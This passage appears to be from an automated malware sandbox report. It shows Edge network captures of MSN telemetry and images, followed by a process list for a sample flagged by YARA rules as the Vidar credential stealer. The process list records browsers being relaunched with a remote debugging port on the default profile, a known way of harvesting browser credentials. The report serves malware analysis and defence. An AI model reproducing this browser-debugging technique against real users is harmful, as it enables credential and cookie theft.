                                                                                                                                                                                                                                                      2024-11-30 21:38:52 UTC297INData Raw: 7b 22 62 61 74 63 68 72 73 70 22 3a 7b 22 76 65 72 22 3a 22 31 2e 30 22 2c 22 65 72 72 6f 72 73 22 3a 5b 7b 22 70 6c 61 63 65 6d 65 6e 74 22 3a 22 38 38 30 30 30 33 30 38 22 2c 22 65 72 72 6f 72 73 22 3a 5b 7b 22 63 6f 64 65 22 3a 32 30 34 30 2c 22 6d 73 67 22 3a 22 44 65 6d 61 6e 64 20 73 6f 75 72 63 65 20 72 65 74 75 72 6e 73 20 65 72 72 6f 72 20 28 4e 61 6d 65 3a 20 47 4e 5f 70 73 2c 20 45 72 72 6f 72 3a 20 4e 6f 20 65 6c 69 67 69 62 6c 65 20 63 6f 6e 74 65 6e 74 2e 29 2e 22 7d 5d 7d 2c 7b 22 70 6c 61 63 65 6d 65 6e 74 22 3a 22 31 30 38 33 37 33 39 33 22 2c 22 65 72 72 6f 72 73 22 3a 5b 7b 22 63 6f 64 65 22 3a 32 30 34 30 2c 22 6d 73 67 22 3a 22 44 65 6d 61 6e 64 20 73 6f 75 72 63 65 20 72 65 74 75 72 6e 73 20 65 72 72 6f 72 20 28 4e 61 6d 65 3a 20 47
                                                                                                                                                                                                                                                      Data Ascii: {"batchrsp":{"ver":"1.0","errors":[{"placement":"88000308","errors":[{"code":2040,"msg":"Demand source returns error (Name: GN_ps, Error: No eligible content.)."}]},{"placement":"10837393","errors":[{"code":2040,"msg":"Demand source returns error (Name: G


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                      145192.168.2.104991852.182.143.2134432116C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:52 UTC1082OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1733002729075&time-delta-to-apply-millis=use-collector-delta&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                      Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                      Content-Length: 3781
                                                                                                                                                                                                                                                      sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                      Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                      Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                      Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                      Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                      Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                      Cookie: _C_ETH=1; USRLOC=; MUID=2A00BA3058306B91366DAF7759986AB6; _EDGE_S=F=1&SID=3DD5691DFF4E6D4327747C5AFE686C97; _EDGE_V=1
                                                                                                                                                                                                                                                      2024-11-30 21:38:52 UTC3781OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 50 61 67 65 56 69 65 77 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 31 2d 33 30 54 32 31 3a 33 38 3a 34 39 2e 30 37 30 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 31 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 30 63 63 34 36 38 37 64 2d 66 65 63 37 2d 34 37 61 63 2d 39 36 63 38 2d 32 66 65 31 62 32 30 62 38 34 63 65 22 2c 22 65 70 6f 63 68 22 3a 22 32 30 39 32 36 38 33 35 32 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65 22
                                                                                                                                                                                                                                                      Data Ascii: {"name":"MS.News.Web.PageView","time":"2024-11-30T21:38:49.070Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":1,"installId":"0cc4687d-fec7-47ac-96c8-2fe1b20b84ce","epoch":"209268352"},"app":{"locale"
                                                                                                                                                                                                                                                      2024-11-30 21:38:52 UTC890INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                      P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                      Set-Cookie: MC1=GUID=610e7b66be274915b932bfaca4e12923&HASH=610e&LV=202411&V=4&LU=1733002732617; Domain=.microsoft.com; Expires=Sun, 30 Nov 2025 21:38:52 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                      Set-Cookie: MS0=97e178e51f734b0f9a2305761f9f416a; Domain=.microsoft.com; Expires=Sat, 30 Nov 2024 22:08:52 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                      time-delta-millis: 3542
                                                                                                                                                                                                                                                      Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                      Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                      Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                      Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:52 GMT
                                                                                                                                                                                                                                                      Connection: close


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                      146192.168.2.104992223.200.3.114432116C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:52 UTC634OUTGET /tenant/amp/entityid/AA13Q6AL.img HTTP/1.1
                                                                                                                                                                                                                                                      Host: img-s-msn-com.akamaized.net
                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                      sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                      Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                      Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                      Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                      2024-11-30 21:38:52 UTC516INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Content-Type: image/png
                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                      Content-Location: https://img.s-msn.com/tenant/amp/entityid/AA13Q6AL
                                                                                                                                                                                                                                                      Last-Modified: Sat, 23 Nov 2024 13:20:48 GMT
                                                                                                                                                                                                                                                      X-Source-Length: 1658
                                                                                                                                                                                                                                                      X-Datacenter: westus
                                                                                                                                                                                                                                                      X-ActivityId: 4d48a1b6-f53b-4e77-9d86-8bdbb1376117
                                                                                                                                                                                                                                                      Timing-Allow-Origin: *
                                                                                                                                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                                                                                                                                      X-ResizerVersion: 1.0
                                                                                                                                                                                                                                                      Content-Length: 1658
                                                                                                                                                                                                                                                      Cache-Control: public, max-age=186171
                                                                                                                                                                                                                                                      Expires: Tue, 03 Dec 2024 01:21:43 GMT
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:52 GMT
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      2024-11-30 21:38:52 UTC1658INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 20 00 00 00 20 08 06 00 00 00 73 7a 7a f4 00 00 00 06 62 4b 47 44 00 ff 00 ff 00 ff a0 bd a7 93 00 00 06 2f 49 44 41 54 58 c3 d5 57 7d 6c 14 45 14 7f 33 b3 bb 77 d7 2b a5 e5 a3 48 a9 7c c4 10 82 44 12 25 d8 18 4d 8a 5a 35 11 49 0d d2 26 fc 51 03 c6 04 c3 57 03 25 a0 50 b0 11 21 d4 a4 26 02 51 f0 0b 22 06 12 30 a6 84 18 48 8a 5a 08 22 88 c4 80 80 f6 0f 3e 5a 01 11 90 c2 41 da bb 9d dd 19 df cc ee 6d f7 bc 83 16 89 31 ee e5 dd 9b 9d db 9d df ef fd de bc b7 7b 00 ff f1 41 ee f6 86 8d 0d 17 f3 be ed 3c bf 2d 61 d1 32 37 6a 15 09 d3 e0 c4 20 27 a4 41 b7 44 fb f7 db b4 6b 56 49 d7 bf 42 a0 a1 41 d2 a1 a2 e3 a5 7d 7f b6 6f 3a 2f ec b8 99 df 1f 68 3c 0f 88 45 01 0c 0a 04 4d 32 72 81 30 da 50 50 3c 6a d3 8e
                                                                                                                                                                                                                                                      Data Ascii: PNGIHDR szzbKGD/IDATXW}lE3w+H|D%MZ5I&QW%P!&Q"0HZ">ZAm1{A<-a27j 'ADkVIBA}o:/h<EM2r0PP<j


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                      147192.168.2.104992423.200.3.114432116C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:52 UTC633OUTGET /tenant/amp/entityid/AAc9vHK.img HTTP/1.1
                                                                                                                                                                                                                                                      Host: img-s-msn-com.akamaized.net
                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                      sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                      Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                      Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                      Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                      2024-11-30 21:38:52 UTC516INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                      Last-Modified: Mon, 11 Nov 2024 13:51:58 GMT
                                                                                                                                                                                                                                                      X-Datacenter: northeu
                                                                                                                                                                                                                                                      X-ActivityId: 03b090a8-ff0d-477a-9433-19affde5f1c7
                                                                                                                                                                                                                                                      Timing-Allow-Origin: *
                                                                                                                                                                                                                                                      X-Frame-Options: deny
                                                                                                                                                                                                                                                      X-ResizerVersion: 1.0
                                                                                                                                                                                                                                                      Content-Type: image/png
                                                                                                                                                                                                                                                      Content-Location: https://img.s-msn.com/tenant/amp/entityid/AAc9vHK
                                                                                                                                                                                                                                                      X-Source-Length: 1218
                                                                                                                                                                                                                                                      Content-Length: 1218
                                                                                                                                                                                                                                                      Cache-Control: public, max-age=317756
                                                                                                                                                                                                                                                      Expires: Wed, 04 Dec 2024 13:54:48 GMT
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:52 GMT
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      2024-11-30 21:38:52 UTC1218INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 20 00 00 00 20 08 06 00 00 00 73 7a 7a f4 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 71 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 35 2d 63 30 31 34 20 37 39 2e 31 35 31 34 38 31 2c 20 32 30 31 33 2f 30 33 2f 31 33 2d 31 32 3a 30 39 3a 31 35 20 20
                                                                                                                                                                                                                                                      Data Ascii: PNGIHDR szztEXtSoftwareAdobe ImageReadyqe<qiTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5-c014 79.151481, 2013/03/13-12:09:15


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                      148192.168.2.104992523.200.3.114432116C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:52 UTC634OUTGET /tenant/amp/entityid/BB1lFz6G.img HTTP/1.1
                                                                                                                                                                                                                                                      Host: img-s-msn-com.akamaized.net
                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                      sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                      Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                      Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                      Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                      2024-11-30 21:38:52 UTC516INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Content-Type: image/png
                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                      Content-Location: https://img.s-msn.com/tenant/amp/entityid/BB1lFz6G
                                                                                                                                                                                                                                                      Last-Modified: Sat, 23 Nov 2024 18:14:45 GMT
                                                                                                                                                                                                                                                      X-Source-Length: 5699
                                                                                                                                                                                                                                                      X-Datacenter: eastus
                                                                                                                                                                                                                                                      X-ActivityId: 5c4ddcbc-0d99-4ea0-a3c4-13e18d04c61f
                                                                                                                                                                                                                                                      Timing-Allow-Origin: *
                                                                                                                                                                                                                                                      X-Frame-Options: deny
                                                                                                                                                                                                                                                      X-ResizerVersion: 1.0
                                                                                                                                                                                                                                                      Content-Length: 5699
                                                                                                                                                                                                                                                      Cache-Control: public, max-age=203657
                                                                                                                                                                                                                                                      Expires: Tue, 03 Dec 2024 06:13:09 GMT
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:52 GMT
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      2024-11-30 21:38:52 UTC5699INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 32 00 00 00 32 08 06 00 00 00 1e 3f 88 b1 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 20 63 48 52 4d 00 00 7a 26 00 00 80 84 00 00 fa 00 00 00 80 e8 00 00 75 30 00 00 ea 60 00 00 3a 98 00 00 17 70 9c ba 51 3c 00 00 00 84 65 58 49 66 4d 4d 00 2a 00 00 00 08 00 05 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 4a 01 1b 00 05 00 00 00 01 00 00 00 52 01 28 00 03 00 00 00 01 00 02 00 00 87 69 00 04 00 00 00 01 00 00 00 5a 00 00 00 00 00 00 00 48 00 00 00 01 00 00 00 48 00 00 00 01 00 03 a0 01 00 03 00 00 00 01 00 01 00 00 a0 02 00 04 00 00 00 01 00 00 00 32 a0 03 00 04 00 00 00 01 00 00 00 32 00 00 00 00 86 f1 c2 a8 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00
                                                                                                                                                                                                                                                      Data Ascii: PNGIHDR22?gAMAa cHRMz&u0`:pQ<eXIfMM*JR(iZHH22pHYs


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                      149192.168.2.104992623.200.3.114432116C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:52 UTC634OUTGET /tenant/amp/entityid/AA1hk7Sh.img HTTP/1.1
                                                                                                                                                                                                                                                      Host: img-s-msn-com.akamaized.net
                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                      sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                      Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                      Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                      Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                      2024-11-30 21:38:52 UTC516INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                      Last-Modified: Sun, 17 Nov 2024 01:27:48 GMT
                                                                                                                                                                                                                                                      X-Datacenter: eastus
                                                                                                                                                                                                                                                      X-ActivityId: 4e8f5161-6e89-49b3-b675-e3ba25e83bf7
                                                                                                                                                                                                                                                      Timing-Allow-Origin: *
                                                                                                                                                                                                                                                      X-Frame-Options: deny
                                                                                                                                                                                                                                                      X-ResizerVersion: 1.0
                                                                                                                                                                                                                                                      Content-Type: image/png
                                                                                                                                                                                                                                                      Content-Location: https://img.s-msn.com/tenant/amp/entityid/AA1hk7Sh
                                                                                                                                                                                                                                                      X-Source-Length: 6962
                                                                                                                                                                                                                                                      Content-Length: 6962
                                                                                                                                                                                                                                                      Cache-Control: public, max-age=402638
                                                                                                                                                                                                                                                      Expires: Thu, 05 Dec 2024 13:29:30 GMT
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:52 GMT
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      2024-11-30 21:38:52 UTC6962INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 32 00 00 00 32 08 06 00 00 00 1e 3f 88 b1 00 00 0c 3f 69 43 43 50 49 43 43 20 50 72 6f 66 69 6c 65 00 00 48 89 95 57 07 58 53 c9 16 9e 5b 92 90 90 84 12 40 40 4a e8 4d 10 a9 01 a4 84 d0 42 ef 08 36 42 12 20 94 18 03 41 c5 8e 2e 2a b8 76 b1 80 0d 5d 15 51 b0 02 62 47 ec 2c 8a bd 2f 16 54 94 75 b1 60 57 de a4 80 ae fb ca f7 e6 fb e6 ce 7f ff 39 f3 9f 33 e7 ce dc 7b 07 00 8d e3 3c 89 24 0f d5 04 20 5f 5c 28 8d 0f 0d 64 8e 4a 4d 63 92 9e 02 0c d0 01 15 38 01 4b 1e bf 40 c2 8e 8d 8d 04 b0 0c b4 7f 2f ef ae 03 44 de 5e 71 94 6b fd b3 ff bf 16 2d 81 b0 80 0f 00 12 0b 71 86 a0 80 9f 0f f1 7e 00 f0 2a be 44 5a 08 00 51 ce 5b 4c 2a 94 c8 31 ac 40 47 0a 03 84 78 be 1c 67 29 71 95 1c 67 28 f1 6e 85 4d 62 3c 07
                                                                                                                                                                                                                                                      Data Ascii: PNGIHDR22??iCCPICC ProfileHWXS[@@JMB6B A.*v]QbG,/Tu`W93{<$ _\(dJMc8K@/D^qk-q~*DZQ[L*1@Gxg)qg(nMb<


                                                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                                                      Target ID:0
                                                                                                                                                                                                                                                      Start time:16:38:01
                                                                                                                                                                                                                                                      Start date:30/11/2024
                                                                                                                                                                                                                                                      Path:C:\Users\user\Desktop\pyjnkasedf.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                      Commandline:"C:\Users\user\Desktop\pyjnkasedf.exe"
                                                                                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                                                                                      File size:419'328 bytes
                                                                                                                                                                                                                                                      MD5 hash:3A94AC80A1BBE958B6544874F311BE69
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                                      • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.2023242056.00000000004AE000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2023242056.00000000004EE000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      Target ID:9
                                                                                                                                                                                                                                                      Start time:16:38:18
                                                                                                                                                                                                                                                      Start date:30/11/2024
                                                                                                                                                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                                                                                                                                                                                      Imagebase:0x7ff6c5c30000
                                                                                                                                                                                                                                                      File size:3'242'272 bytes
                                                                                                                                                                                                                                                      MD5 hash:83395EAB5B03DEA9720F8D7AC0D15CAA
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      Target ID:11
                                                                                                                                                                                                                                                      Start time:16:38:18
                                                                                                                                                                                                                                                      Start date:30/11/2024
                                                                                                                                                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2388 --field-trial-handle=2144,i,14125693394083356275,3437472649324227348,262144 /prefetch:8
                                                                                                                                                                                                                                                      Imagebase:0x7ff6c5c30000
                                                                                                                                                                                                                                                      File size:3'242'272 bytes
                                                                                                                                                                                                                                                      MD5 hash:83395EAB5B03DEA9720F8D7AC0D15CAA
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      Target ID:13
                                                                                                                                                                                                                                                      Start time:16:38:32
                                                                                                                                                                                                                                                      Start date:30/11/2024
                                                                                                                                                                                                                                                      Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                                                                                                                                                                                      Imagebase:0x7ff6a9290000
                                                                                                                                                                                                                                                      File size:4'210'216 bytes
                                                                                                                                                                                                                                                      MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      Target ID:14
                                                                                                                                                                                                                                                      Start time:16:38:33
                                                                                                                                                                                                                                                      Start date:30/11/2024
                                                                                                                                                                                                                                                      Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2376 --field-trial-handle=2240,i,3036203601739144337,7572605890428226246,262144 /prefetch:3
                                                                                                                                                                                                                                                      Imagebase:0x7ff6a9290000
                                                                                                                                                                                                                                                      File size:4'210'216 bytes
                                                                                                                                                                                                                                                      MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      Target ID:15
                                                                                                                                                                                                                                                      Start time:16:38:33
                                                                                                                                                                                                                                                      Start date:30/11/2024
                                                                                                                                                                                                                                                      Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
                                                                                                                                                                                                                                                      Imagebase:0x7ff6a9290000
                                                                                                                                                                                                                                                      File size:4'210'216 bytes
                                                                                                                                                                                                                                                      MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                      Has elevated privileges:false
